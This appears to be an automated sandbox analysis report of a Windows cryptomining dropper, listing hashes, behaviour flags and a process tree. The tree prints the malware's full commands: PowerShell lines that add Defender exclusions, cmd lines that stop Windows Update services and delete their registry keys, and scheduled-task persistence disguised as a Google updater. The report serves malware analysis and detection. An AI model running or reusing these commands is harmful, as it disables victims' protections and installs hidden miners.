Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
30-09-2022 16:06
Static task
static1
General
-
Target
2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe
-
Size
4.0MB
-
MD5
41382215636e83ce55d622ce7f15733a
-
SHA1
aff94de054bb404000c010c4713998ddc6905626
-
SHA256
2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d
-
SHA512
94216303bf4455bc2a8de631c453bef013c1fab36f28c167c3488730d430713f0f117561bff3137697732b3bf16cab74b772fad79a36fc7c06e5be6fbaafe98d
-
SSDEEP
98304:jgFNGMRUCTguDUdjIF1qZHEfgg1AE1AQamhsDUoYX4:jYN7bThDUdj+qxEYGAE1AQuR
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1892-320-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp xmrig behavioral1/memory/1892-324-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 3388 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1892-320-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp upx behavioral1/memory/1892-324-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp upx -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 3388 set thread context of 4432 3388 updater.exe conhost.exe PID 3388 set thread context of 1892 3388 updater.exe dwm.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4308 sc.exe 3496 sc.exe 808 sc.exe 4324 sc.exe 1520 sc.exe 4804 sc.exe 852 sc.exe 1340 sc.exe 1084 sc.exe 5004 sc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedwm.exepid process 2424 powershell.exe 2424 powershell.exe 2424 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 3544 powershell.exe 3544 powershell.exe 3544 powershell.exe 356 powershell.exe 356 powershell.exe 356 powershell.exe 4688 powershell.exe 4688 powershell.exe 4688 powershell.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe 1892 dwm.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2424 powershell.exe Token: SeIncreaseQuotaPrivilege 2424 powershell.exe Token: SeSecurityPrivilege 2424 powershell.exe Token: SeTakeOwnershipPrivilege 2424 powershell.exe Token: SeLoadDriverPrivilege 2424 powershell.exe Token: SeSystemProfilePrivilege 2424 powershell.exe Token: SeSystemtimePrivilege 2424 powershell.exe Token: SeProfSingleProcessPrivilege 2424 powershell.exe Token: SeIncBasePriorityPrivilege 2424 powershell.exe Token: SeCreatePagefilePrivilege 2424 powershell.exe Token: SeBackupPrivilege 2424 powershell.exe Token: SeRestorePrivilege 2424 powershell.exe Token: SeShutdownPrivilege 2424 powershell.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeSystemEnvironmentPrivilege 2424 powershell.exe Token: SeRemoteShutdownPrivilege 2424 powershell.exe Token: SeUndockPrivilege 2424 powershell.exe Token: SeManageVolumePrivilege 2424 powershell.exe Token: 33 2424 powershell.exe Token: 34 2424 powershell.exe Token: 35 2424 powershell.exe Token: 36 2424 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeIncreaseQuotaPrivilege 3644 powershell.exe Token: SeSecurityPrivilege 3644 powershell.exe Token: SeTakeOwnershipPrivilege 3644 powershell.exe Token: SeLoadDriverPrivilege 3644 powershell.exe Token: SeSystemProfilePrivilege 3644 powershell.exe Token: SeSystemtimePrivilege 3644 powershell.exe Token: SeProfSingleProcessPrivilege 3644 powershell.exe Token: SeIncBasePriorityPrivilege 3644 powershell.exe Token: SeCreatePagefilePrivilege 3644 powershell.exe Token: SeBackupPrivilege 3644 powershell.exe Token: SeRestorePrivilege 3644 powershell.exe Token: SeShutdownPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeSystemEnvironmentPrivilege 3644 powershell.exe Token: SeRemoteShutdownPrivilege 3644 powershell.exe Token: SeUndockPrivilege 3644 powershell.exe Token: SeManageVolumePrivilege 3644 powershell.exe Token: 33 3644 powershell.exe Token: 34 3644 powershell.exe Token: 35 3644 powershell.exe Token: 36 3644 powershell.exe Token: SeIncreaseQuotaPrivilege 3644 powershell.exe Token: SeSecurityPrivilege 3644 powershell.exe Token: SeTakeOwnershipPrivilege 3644 powershell.exe Token: SeLoadDriverPrivilege 3644 powershell.exe Token: SeSystemProfilePrivilege 3644 powershell.exe Token: SeSystemtimePrivilege 3644 powershell.exe Token: SeProfSingleProcessPrivilege 3644 powershell.exe Token: SeIncBasePriorityPrivilege 3644 powershell.exe Token: SeCreatePagefilePrivilege 3644 powershell.exe Token: SeBackupPrivilege 3644 powershell.exe Token: SeRestorePrivilege 3644 powershell.exe Token: SeShutdownPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeSystemEnvironmentPrivilege 3644 powershell.exe Token: SeRemoteShutdownPrivilege 3644 powershell.exe Token: SeUndockPrivilege 3644 powershell.exe Token: SeManageVolumePrivilege 3644 powershell.exe Token: 33 3644 powershell.exe Token: 34 3644 powershell.exe Token: 35 3644 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.execmd.exepowershell.exeupdater.execmd.execonhost.execmd.exedescription pid process target process PID 4876 wrote to memory of 2424 4876 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe powershell.exe PID 4876 wrote to memory of 2424 4876 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe powershell.exe PID 4876 wrote to memory of 3696 4876 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe cmd.exe PID 4876 wrote to memory of 3696 4876 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe cmd.exe PID 4876 wrote to memory of 3644 4876 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe powershell.exe PID 4876 wrote to memory of 3644 4876 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe powershell.exe PID 3696 wrote to memory of 4324 3696 cmd.exe sc.exe PID 3696 wrote to memory of 4324 3696 cmd.exe sc.exe PID 3696 wrote to memory of 1084 3696 cmd.exe sc.exe PID 3696 wrote to memory of 1084 3696 cmd.exe sc.exe PID 3696 wrote to memory of 1520 3696 cmd.exe sc.exe PID 3696 wrote to memory of 1520 3696 cmd.exe sc.exe PID 3696 wrote to memory of 4308 3696 cmd.exe sc.exe PID 3696 wrote to memory of 4308 3696 cmd.exe sc.exe PID 3696 wrote to memory of 5004 3696 cmd.exe sc.exe PID 3696 wrote to memory of 5004 3696 cmd.exe sc.exe PID 3696 wrote to memory of 4196 3696 cmd.exe reg.exe PID 3696 wrote to memory of 4196 3696 cmd.exe reg.exe PID 3696 wrote to memory of 1160 3696 cmd.exe reg.exe PID 3696 wrote to memory of 1160 3696 cmd.exe reg.exe PID 3696 wrote to memory of 4508 3696 cmd.exe reg.exe PID 3696 wrote to memory of 4508 3696 cmd.exe reg.exe PID 3696 wrote to memory of 1684 3696 cmd.exe reg.exe PID 3696 wrote to memory of 1684 3696 cmd.exe reg.exe PID 3696 wrote to memory of 1852 3696 cmd.exe reg.exe PID 3696 wrote to memory of 1852 3696 cmd.exe reg.exe PID 4876 wrote to memory of 3544 4876 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe powershell.exe PID 4876 wrote to memory of 3544 4876 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe powershell.exe PID 3544 wrote to memory of 4128 3544 powershell.exe schtasks.exe PID 3544 wrote to memory of 4128 3544 powershell.exe schtasks.exe PID 3388 wrote to memory of 356 3388 updater.exe powershell.exe PID 3388 wrote to memory of 356 3388 updater.exe powershell.exe PID 3388 wrote to memory of 4652 3388 updater.exe cmd.exe PID 3388 wrote to memory of 4652 3388 updater.exe cmd.exe PID 3388 wrote to memory of 4688 3388 updater.exe powershell.exe PID 3388 wrote to memory of 4688 3388 updater.exe powershell.exe PID 4652 wrote to memory of 3496 4652 cmd.exe sc.exe PID 4652 wrote to memory of 3496 4652 cmd.exe sc.exe PID 4652 wrote to memory of 4804 4652 cmd.exe sc.exe PID 4652 wrote to memory of 4804 4652 cmd.exe sc.exe PID 4652 wrote to memory of 852 4652 cmd.exe sc.exe PID 4652 wrote to memory of 852 4652 cmd.exe sc.exe PID 4652 wrote to memory of 1340 4652 cmd.exe sc.exe PID 4652 wrote to memory of 1340 4652 cmd.exe sc.exe PID 4652 wrote to memory of 808 4652 cmd.exe sc.exe PID 4652 wrote to memory of 808 4652 cmd.exe sc.exe PID 4652 wrote to memory of 192 4652 cmd.exe reg.exe PID 4652 wrote to memory of 192 4652 cmd.exe reg.exe PID 4652 wrote to memory of 164 4652 cmd.exe reg.exe PID 4652 wrote to memory of 164 4652 cmd.exe reg.exe PID 4652 wrote to memory of 3232 4652 cmd.exe reg.exe PID 4652 wrote to memory of 3232 4652 cmd.exe reg.exe PID 4652 wrote to memory of 3988 4652 cmd.exe reg.exe PID 4652 wrote to memory of 3988 4652 cmd.exe reg.exe PID 4652 wrote to memory of 4356 4652 cmd.exe reg.exe PID 4652 wrote to memory of 4356 4652 cmd.exe reg.exe PID 3388 wrote to memory of 4432 3388 updater.exe conhost.exe PID 3388 wrote to memory of 4432 3388 updater.exe conhost.exe PID 3388 wrote to memory of 4432 3388 updater.exe conhost.exe PID 3388 wrote to memory of 4612 3388 updater.exe cmd.exe PID 3388 wrote to memory of 4612 3388 updater.exe cmd.exe PID 4432 wrote to memory of 1192 4432 conhost.exe cmd.exe PID 4432 wrote to memory of 1192 4432 conhost.exe cmd.exe PID 4612 wrote to memory of 1008 4612 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe"C:\Users\Admin\AppData\Local\Temp\2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#zfalrzu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe llktminrzivp2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\system32\dwm.exeC:\Windows\system32\dwm.exe qtbgcbbuyarrseoa 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9abHIdInko1dNj2btVqFpVDPxbdEbNaQGAVINOHgf8WWal3b6c2wr6mRVWR/3OEXgmNHc0PdsvyYK2oX+Nd+NLu2R15GYAs/dQrH+CfI88Ko8ilwYx+F3flcrT35XvHxF1c2⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD565c8499b7e69d7dd364815dbae2b6989
SHA123df5d601dbd83f5a6f686f952448b0cc21d3b92
SHA256599dd04a954cb0a826224cf627d38d0bea8ee3d0896d0733ee731e114197d73e
SHA5121695633aafa095c510fb19895c6d28bf12ea597b873751e68a0a2364c34cce2322631945047e639fd1f165c60fd4e1f1fcf39acd4b714b7d25d50381f7e6ffdf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD53fd2e7427285bcbc00dcc0dc49b40196
SHA1d6e56706c26665d2be693ab870898d340beb4bdd
SHA2562d861694a1ec8b3863a81ba0df740390eb7d01835e4ca4eee367aba797891956
SHA51278048f1543f538d0acc6777de939207ae30cea312e551bf86ccfd31779c92194a7774b0f342ff2d95e0876169755f008d08fdf76f2fb2e4ecab73564c1e7a3b0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD599f3c4e76ac63484d214fb91349644e8
SHA1f065388679a20bd59e75166ba9174b8fe8c510bf
SHA256a01e65c4ee2ce09215f4e35db060152f1ab5f21ce84cfa954118cc724bfe4e9c
SHA512c9a0a4b5c13d381875485316ce56f56839dd76bc53fd574139830817252ad0e1ffcdf64f408d1942a3c95541181d07c15ecff9f20b5f0de3890490de0f530e67
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b048bf8754fa7e5cec67d8cd464c8bf9
SHA1511440b7c0eba55472dad88c574a367ce4907456
SHA2565d1954206c50f6f1107b7622dbc812e2f7de31a4fe7ef6a0985505701bd9f9b3
SHA5123fc4dc6bc9037508ee3f85a1c471114133a7984c78d75214add56f2dec47996abc2f9a1bd93f0b120760932e1a99d5450204e44490bc23f254e30a0641086c72
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
4.0MB
MD5c5eccb1c34f5b5280b63739c2c0c09e8
SHA1e2005f576140f66759cb8a68c4aec4f94e61b94b
SHA2569853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c
SHA51271d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
4.0MB
MD5c5eccb1c34f5b5280b63739c2c0c09e8
SHA1e2005f576140f66759cb8a68c4aec4f94e61b94b
SHA2569853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c
SHA51271d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd
-
C:\Users\Admin\AppData\Roaming\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
memory/164-288-0x0000000000000000-mapping.dmp
-
memory/192-285-0x0000000000000000-mapping.dmp
-
memory/356-226-0x0000000000000000-mapping.dmp
-
memory/808-276-0x0000000000000000-mapping.dmp
-
memory/852-273-0x0000000000000000-mapping.dmp
-
memory/1008-315-0x0000000000000000-mapping.dmp
-
memory/1084-166-0x0000000000000000-mapping.dmp
-
memory/1160-179-0x0000000000000000-mapping.dmp
-
memory/1192-314-0x0000000000000000-mapping.dmp
-
memory/1340-274-0x0000000000000000-mapping.dmp
-
memory/1520-169-0x0000000000000000-mapping.dmp
-
memory/1684-185-0x0000000000000000-mapping.dmp
-
memory/1852-188-0x0000000000000000-mapping.dmp
-
memory/1892-328-0x0000016C44700000-0x0000016C44720000-memory.dmpFilesize
128KB
-
memory/1892-323-0x0000016BB19E0000-0x0000016BB1A00000-memory.dmpFilesize
128KB
-
memory/1892-319-0x0000016BB0010000-0x0000016BB0030000-memory.dmpFilesize
128KB
-
memory/1892-318-0x00007FF7A8A325D0-mapping.dmp
-
memory/1892-324-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmpFilesize
8.0MB
-
memory/1892-320-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmpFilesize
8.0MB
-
memory/1892-330-0x0000016C44700000-0x0000016C44720000-memory.dmpFilesize
128KB
-
memory/1892-325-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmpFilesize
128KB
-
memory/1892-326-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmpFilesize
128KB
-
memory/1892-329-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmpFilesize
128KB
-
memory/1892-327-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmpFilesize
128KB
-
memory/2424-131-0x000001F39EE00000-0x000001F39EE76000-memory.dmpFilesize
472KB
-
memory/2424-126-0x000001F39EC50000-0x000001F39EC72000-memory.dmpFilesize
136KB
-
memory/2424-120-0x0000000000000000-mapping.dmp
-
memory/3232-289-0x0000000000000000-mapping.dmp
-
memory/3496-267-0x0000000000000000-mapping.dmp
-
memory/3544-206-0x0000000000000000-mapping.dmp
-
memory/3644-160-0x0000000000000000-mapping.dmp
-
memory/3696-159-0x0000000000000000-mapping.dmp
-
memory/3988-306-0x0000000000000000-mapping.dmp
-
memory/4128-223-0x0000000000000000-mapping.dmp
-
memory/4196-176-0x0000000000000000-mapping.dmp
-
memory/4308-172-0x0000000000000000-mapping.dmp
-
memory/4324-161-0x0000000000000000-mapping.dmp
-
memory/4356-307-0x0000000000000000-mapping.dmp
-
memory/4432-309-0x00007FF7B55914E0-mapping.dmp
-
memory/4508-184-0x0000000000000000-mapping.dmp
-
memory/4612-312-0x0000000000000000-mapping.dmp
-
memory/4652-264-0x0000000000000000-mapping.dmp
-
memory/4688-265-0x0000000000000000-mapping.dmp
-
memory/4804-271-0x0000000000000000-mapping.dmp
-
memory/5004-175-0x0000000000000000-mapping.dmp